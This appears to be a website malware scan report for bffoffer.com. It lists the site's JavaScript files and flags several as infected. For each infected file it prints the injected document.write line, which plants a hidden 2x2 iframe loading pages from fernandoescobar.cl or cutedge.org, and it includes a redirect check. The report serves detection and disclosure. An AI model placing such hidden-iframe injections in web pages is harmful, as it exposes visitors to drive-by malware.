Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bffoffer.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.bffoffer.com/ | 200 OK Content-Length: 77837 Content-Type: text/html | clean |
http://www.bffoffer.com/js/prototype/prototype.js | 200 OK Content-Length: 163313 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/lib/ccard.js | 200 OK Content-Length: 749 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/prototype/validation.js | 200 OK Content-Length: 37720 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632></iframe>');
var Validator = Class.create(); Validator.prototype = { initialize : function(className, error, test, options) { if(typeof test == 'function'){ this.options = $H(options); this._test = test; } else { this.options = $H(test); 'MC': [new RegExp('^5[1-5][0-9]{14}$'), new RegExp('^[0-9]{3}$'), true], 'AE': [new RegExp('^3[47][0-9]{13}$'), new RegExp('^[0-9]{4}$'), true], 'DI': [new RegExp('^6011[0-9]{12}$'), new RegExp('^[0-9]{3}$'), true], 'JCB': [new RegExp('^(3[0-9]{15}|(2131|1800)[0-9]{11})$'), new RegExp('^[0-9]{4}$'), true], 'OT': [false, new RegExp('^([0-9]{3}|[0-9]{4})?$'), false] }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/builder.js | 200 OK Content-Length: 4899 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', "KBD LABEL LEGEND LI LINK MAP MENU META NOFRAMES NOSCRIPT OBJECT OL OPTGROUP OPTION P "+ "PARAM PRE Q S SAMP SCRIPT SELECT SMALL SPAN STRIKE STRONG STYLE SUB SUP TABLE TBODY TD "+ "TEXTAREA TFOOT TH THEAD TITLE TR TT U UL VAR").split(/\s+/); tags.each( function(tag){ scope[tag] = function() { return Builder.node.apply(Builder, [tag].concat($A(arguments))); }; }); } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/effects.js | 200 OK Content-Length: 38907 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632></iframe>');
String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this function(effect) { Effect.Methods[effect] = function(element, options){ element = $(element); Effect[effect.charAt(0).toUpperCase() + effect.substring(1)](element, options); return element; }; } ); $w('getInlineOpacity forceRerendering setContentZoom collectTextNodes collectTextNodesIgnoreClass getStyles').each( function(f) { Effect.Methods[f] = Element[f]; } ); Element.addMethods(Effect.Methods); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 31354 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632></iframe>');
if(Object.isUndefined(Effect)) throw("dragdrop.js requires including script.aculo.us' effects.js library"); var Droppables = { drops: [], remove: function(element) { this.drops = this.drops.reject(function(d) { return d.element==$(element) }); }, add: function(element) { elements.push(e); if(recursive) { var grandchildren = Element.findChildren(e, only, recursive, tagName); if(grandchildren) elements.push(grandchildren); } }); return (elements.length>0 ? elements.flatten() : []); }; Element.offsetSize = function (element, type) { return element['offset' + ((type=='vertical' || type=='height') ? 'Height' : 'Width')]; }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/controls.js | 200 OK Content-Length: 34801 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/scriptaculous/slider.js | 200 OK Content-Length: 10335 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/varien/js.js | 200 OK Content-Length: 22114 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/varien/form.js | 200 OK Content-Length: 11868 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
VarienForm = Class.create(); VarienForm.prototype = { initialize: function(formId, firstFieldFocus){ this.form = $(formId); if (!this.form) { return; } this.cache = $A(); this.currLoader = false; this.currDataIndex while (this.zipElement.hasClassName('required-entry')) { this.zipElement.removeClassName('required-entry'); } if (wildCard != undefined) { wildCard.hide(); } } else { this.zipElement.addClassName('required-entry'); if (wildCard != undefined) { wildCard.show(); } } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/varien/menu.js | 200 OK Content-Length: 4580 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
var mainNav = function() { var main = { obj_nav : $(arguments[0]) || $("nav"), settings : { show_delay : 0, hide_delay : 0, _ie6 : /MSIE 6.+Win/.test(navigator.userAgent), _ie7 : /MSIE 7 sub_elm.removeClassName("shown-sub"); } }, main.settings.hide_delay); } }; if (arguments[1]) { main.settings = Object.extend(main.settings, arguments[1]); } if (main.obj_nav) { main.init(main.obj_nav, false); } }; document.observe("dom:loaded", function() { mainNav("nav", {"show_delay":"100","hide_delay":"100"}); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/mage/translate.js | 200 OK Content-Length: 1751 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
var Translate = Class.create(); Translate.prototype = { initialize: function(data){ this.data = $H(data); }, translate : function(){ var args = arguments; var text = arguments[0]; if(this.data.get(text)){ return this.data.get(text); } return text; }, add : function() { if (arguments.length > 1) { this.data.set(arguments[0], arguments[1]); } else if (typeof arguments[0] =='object') { $H(arguments[0]).each(function (pair){ this.data.set(pair.key, pair.value); }.bind(this)); } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/mage/cookies.js | 200 OK Content-Length: 2615 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/magestore/productoffer.js | 200 OK Content-Length: 8802 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bffoffer.com
Result:
GET / HTTP/1.1
Host: bffoffer.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bffoffer.com
Referer: http://www.google.com/search?q=bffoffer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bffoffer.com
Referer: http://www.google.com/search?q=bffoffer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.